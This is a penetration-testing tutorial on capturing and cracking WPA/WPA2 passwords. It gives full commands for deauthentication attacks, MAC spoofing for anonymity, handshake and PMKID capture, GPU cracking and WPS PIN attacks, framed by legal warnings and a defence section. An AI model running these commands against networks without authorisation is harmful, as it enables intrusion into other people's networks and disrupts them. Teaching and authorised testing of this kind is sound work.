Table of Contents
Tutorial Info
How to Capture & Crack WPA/WPA2 Wireless Passwords
Learn professional wireless security assessment techniques for capturing and analyzing WPA/WPA2 handshakes, including modern GPU-accelerated cracking methods.
Introduction to Wireless Security Testing
Wireless network security assessment is a critical component of comprehensive penetration testing. WPA/WPA2 protocols, while significantly more secure than their predecessors, still contain vulnerabilities that can be exploited under certain conditions.
This tutorial provides a comprehensive guide to professional wireless security testing, covering the complete process from reconnaissance to password recovery using industry-standard tools and methodologies.
Legal and Ethical Framework
CRITICAL LEGAL WARNING
- • Only test wireless networks you own or have explicit written permission to test
- • Unauthorized wireless network access is illegal in most jurisdictions
- • Penalties can include significant fines and imprisonment
- • Always obtain proper authorization before beginning any wireless security testing
- • Document all authorized testing activities thoroughly
Wireless security testing should only be performed as part of authorized penetration testing engagements or on networks you own. This tutorial is designed for security professionals, researchers, and students learning about wireless security in controlled environments.
Wireless Security Fundamentals
WPA/WPA2 Protocol Overview
Wi-Fi Protected Access (WPA) and WPA2 replaced the vulnerable WEP protocol with stronger encryption and authentication mechanisms:
- WPA: Uses TKIP encryption with RC4 cipher
- WPA2: Uses CCMP encryption with AES cipher (more secure)
- PSK (Pre-Shared Key): Personal mode using shared passwords
- Enterprise: Uses RADIUS authentication (802.1X)
Four-Way Handshake Process
The WPA/WPA2 four-way handshake establishes encryption keys between client and access point:
Four-Way Handshake Process: 1. AP → Client: ANonce (AP Nonce) - Access point sends random number to client 2. Client → AP: SNonce + MIC (Message Integrity Check) - Client responds with its nonce and MIC 3. AP → Client: GTK (Group Temporal Key) + MIC - Access point sends group key with MIC 4. Client → AP: Confirmation + MIC - Client confirms reception Key Derivation: PMK (Pairwise Master Key) = PBKDF2(password, SSID, 4096, 256) PTK (Pairwise Transient Key) = PRF(PMK + ANonce + SNonce + MAC addresses)
Vulnerability Analysis
WPA/WPA2 vulnerabilities primarily stem from weak passwords and implementation flaws:
- Weak passwords: Short or common passwords vulnerable to dictionary attacks
- Handshake capture: Four-way handshake can be captured and analyzed offline
- PMKID attacks: Newer attack method requiring only one frame
- WPS vulnerabilities: PIN-based authentication weaknesses
Tools and Environment Setup
Hardware Requirements
Proper hardware is essential for effective wireless security testing:
- USB Wireless Adapter: Must support monitor mode and packet injection
- Recommended Chipsets: Atheros AR9271, Ralink RT3070, Realtek RTL8812AU
- Popular Models: Alfa AWUS036ACS, TP-Link AC600, Panda PAU09
- External Antenna: Optional but recommended for better range and reception
Hardware Tip: Test your wireless adapter's capabilities with 'iwconfig' and 'airmon-ng' before beginning. Not all adapters support the required monitor mode and packet injection features.
Software Installation
Install the necessary tools for wireless security testing:
# Kali Linux (tools pre-installed) sudo apt update sudo apt install aircrack-ng hashcat hcxtools hcxdumptool # Ubuntu/Debian sudo apt update sudo apt install aircrack-ng hashcat reaver pixiewps # Additional tools sudo apt install wireshark tshark macchanger # GPU drivers for hashcat (NVIDIA) sudo apt install nvidia-driver-460 nvidia-cuda-toolkit # GPU drivers for hashcat (AMD) sudo apt install amdgpu-pro-install
Wireless Adapter Configuration
# Check wireless interfaces iwconfig # Check for monitor mode support sudo airmon-ng # Kill interfering processes sudo airmon-ng check kill # Enable monitor mode sudo airmon-ng start wlan0 # Verify monitor mode iwconfig # Optional: Change MAC address for anonymity sudo ifconfig wlan0mon down sudo macchanger -r wlan0mon sudo ifconfig wlan0mon up
Wireless Network Reconnaissance
Network Discovery and Analysis
Begin by discovering and analyzing available wireless networks:
# Basic network discovery sudo airodump-ng wlan0mon # Target specific channel for better reception sudo airodump-ng wlan0mon -c 6 # Save discovery results to file sudo airodump-ng wlan0mon -w discovery_scan # Show only WPA/WPA2 networks sudo airodump-ng wlan0mon --encrypt WPA # Advanced scanning with wash (WPS detection) sudo wash -i wlan0mon
Target Selection Criteria
Consider these factors when selecting targets for authorized testing:
- Signal Strength: Strong signal improves capture reliability
- Connected Clients: Active clients enable handshake capture
- WPS Enabled: Additional attack vectors available
- Encryption Type: WPA2 preferred over WPA for testing
- Authorization: ONLY test networks you own or have permission to test
Monitor Mode Setup
# Set up monitoring for specific target sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture # Monitor with client filtering sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture --ignore-negative-one # Extended monitoring with better output sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture --output-format pcap
WPA/WPA2 Handshake Capture
Passive Handshake Capture
Passive capture involves waiting for natural client connections:
# Start passive capture sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshake # Wait for "WPA handshake" message in top-right corner # This appears when a client connects or reconnects # Monitor output for handshake indication: # [ CH 6 ][ Elapsed: 0 s ][ 2024-11-14 14:30:15 ][ WPA handshake: AA:BB:CC:DD:EE:FF # Capture will be saved as handshake-01.cap
Active Handshake Capture (Deauthentication)
Active capture forces clients to reconnect by sending deauthentication frames:
# Terminal 1: Continue monitoring sudo airodump-ng wlan0mon --bssid AA:BB:CC:DD:EE:FF -c 6 -w handshake # Terminal 2: Deauthenticate all clients sudo aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon # Deauthenticate specific client sudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c 11:22:33:44:55:66 wlan0mon # Gentle deauth (fewer packets) sudo aireplay-ng --deauth 3 -a AA:BB:CC:DD:EE:FF wlan0mon # Continuous deauth (be careful!) sudo aireplay-ng --deauth 0 -a AA:BB:CC:DD:EE:FF wlan0mon
Caution: Deauthentication attacks cause temporary denial of service. Use minimal packets necessary and only on authorized networks during approved testing windows.
Handshake Verification
# Verify captured handshake sudo aircrack-ng handshake-01.cap # Check handshake quality sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap # Alternative verification with cowpatty cowpatty -r handshake-01.cap -s "NetworkName" # Convert to hashcat format sudo aircrack-ng handshake-01.cap -j hashcat_file # Or use cap2hccapx cap2hccapx handshake-01.cap handshake.hccapx
Password Cracking Techniques
Dictionary and Wordlist Attacks
Dictionary attacks test common passwords against the captured handshake:
# Basic dictionary attack with aircrack-ng sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt handshake-01.cap # Specify target BSSID sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF handshake-01.cap # Use multiple wordlists sudo aircrack-ng -w /usr/share/wordlists/rockyou.txt,/usr/share/wordlists/fasttrack.txt handshake-01.cap # Create custom wordlist crunch 8 12 abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 > custom.txt # Use John the Ripper for wordlist expansion john --wordlist=/usr/share/wordlists/rockyou.txt --rules --stdout > expanded.txt
Rule-Based Attacks
Rule-based attacks apply transformations to dictionary words:
# Common password transformations # password -> password123, Password, password!, etc. # John the Ripper rules john --wordlist=base_passwords.txt --rules=All --stdout > transformed.txt # Hashcat rules (more on this in GPU section) # Rule examples: # $1$2$3 (append 123) # c (capitalize first letter) # u (uppercase all) # $! (append !) # ^2^0^2^4 (prepend 2024)
Brute Force Attacks
# Generate all possible passwords (length 8) crunch 8 8 abcdefghijklmnopqrstuvwxyz0123456789 | aircrack-ng -w - handshake-01.cap # Brute force with specific pattern crunch 8 8 -t password%%% > brute.txt sudo aircrack-ng -w brute.txt handshake-01.cap # Brute force numeric passwords crunch 8 8 0123456789 | aircrack-ng -w - handshake-01.cap
GPU-Accelerated Cracking
Hashcat Configuration
Hashcat provides significantly faster password cracking using GPU acceleration:
# Convert capture file to hashcat format cap2hccapx handshake-01.cap handshake.hccapx # Or use aircrack-ng conversion aircrack-ng handshake-01.cap -j hashcat_output # Check GPU devices hashcat -I # Basic dictionary attack with hashcat hashcat -m 2500 handshake.hccapx /usr/share/wordlists/rockyou.txt # For newer .22000 format (WPA3/WPA2) hashcat -m 22000 handshake.hc22000 /usr/share/wordlists/rockyou.txt
Performance Optimization
# Rule-based attack with hashcat hashcat -m 2500 handshake.hccapx /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule # Combination attack hashcat -m 2500 handshake.hccapx -a 1 list1.txt list2.txt # Mask attack (brute force with pattern) # ?l = lowercase, ?u = uppercase, ?d = digits, ?s = symbols hashcat -m 2500 handshake.hccapx -a 3 ?u?l?l?l?l?l?d?d?d # Hybrid attack (wordlist + mask) hashcat -m 2500 handshake.hccapx -a 6 /usr/share/wordlists/rockyou.txt ?d?d?d # Performance tuning hashcat -m 2500 handshake.hccapx wordlist.txt -w 3 --force # Resume session hashcat --restore
Advanced Attack Techniques
PMKID Attacks
PMKID attacks require only one frame and don't need deauthentication:
# Install hcxtools sudo apt install hcxtools # Capture PMKID sudo hcxdumptool -o pmkid.pcapng -i wlan0mon --enable_status=1 # Convert to hashcat format hcxpcapngtool -o pmkid.hc22000 -E essidlist pmkid.pcapng # Crack with hashcat hashcat -m 22000 pmkid.hc22000 /usr/share/wordlists/rockyou.txt # Target specific network sudo hcxdumptool -o pmkid.pcapng -i wlan0mon --filterlist=target_macs.txt --filtermode=2
WPS Vulnerabilities
Wi-Fi Protected Setup (WPS) contains several known vulnerabilities:
# Scan for WPS-enabled networks sudo wash -i wlan0mon # WPS PIN attack with reaver sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -S # Pixie dust attack (if supported) sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -K # WPS PIN brute force sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -L -N -d 15 -T .5 -r 3:15 # Bully (alternative to reaver) sudo bully wlan0mon -b AA:BB:CC:DD:EE:FF -v 3
Defense and Mitigation Strategies
Understanding defensive measures is crucial for implementing proper wireless security:
Network Configuration Best Practices
- Strong Passwords: Use complex passwords with 12+ characters
- WPA3 Adoption: Upgrade to WPA3 where supported
- Disable WPS: Turn off WPS to eliminate PIN-based attacks
- MAC Address Filtering: While not foolproof, adds an extra layer
- SSID Security: Don't broadcast network name if not necessary
- Regular Updates: Keep firmware updated on all devices
Enterprise Security Measures
- 802.1X Authentication: Use certificate-based authentication
- Network Segmentation: Isolate wireless networks from critical systems
- Monitoring Systems: Deploy wireless intrusion detection systems
- Guest Networks: Separate guest access from corporate networks
- Regular Auditing: Perform periodic wireless security assessments
Attack Detection and Prevention
Implementing detection mechanisms helps identify potential wireless attacks:
Detection Techniques
- Deauth Detection: Monitor for excessive deauthentication frames
- Rogue AP Detection: Identify unauthorized access points
- Client Monitoring: Track unusual client connection patterns
- Signal Analysis: Detect abnormal signal strength variations
- Log Analysis: Review authentication logs for failed attempts
# Example: Monitoring for deauth attacks
# Use airodump-ng to monitor deauth frames
sudo airodump-ng wlan0mon --output-format csv -w monitoring
# Analyze logs for excessive deauth patterns
awk -F, '$6 ~ /deauth/ {print $1, $2, $6}' monitoring-01.csv
# Set up kismet for comprehensive monitoring
sudo kismet -c wlan0monConclusion
Wireless security testing is an essential component of comprehensive penetration testing. While WPA/WPA2 protocols provide significantly better security than their predecessors, they remain vulnerable to attacks when weak passwords are used or when implementation flaws exist.
The techniques covered in this tutorial represent real-world attack vectors that security professionals must understand to properly assess and defend wireless networks. As wireless technology continues to evolve with WPA3 and other security enhancements, staying current with both attack and defense techniques remains crucial.
Ethical Practice: Remember that the goal of wireless security testing is to improve overall security posture. Always operate within legal boundaries, maintain detailed documentation, and provide actionable remediation guidance in your reports.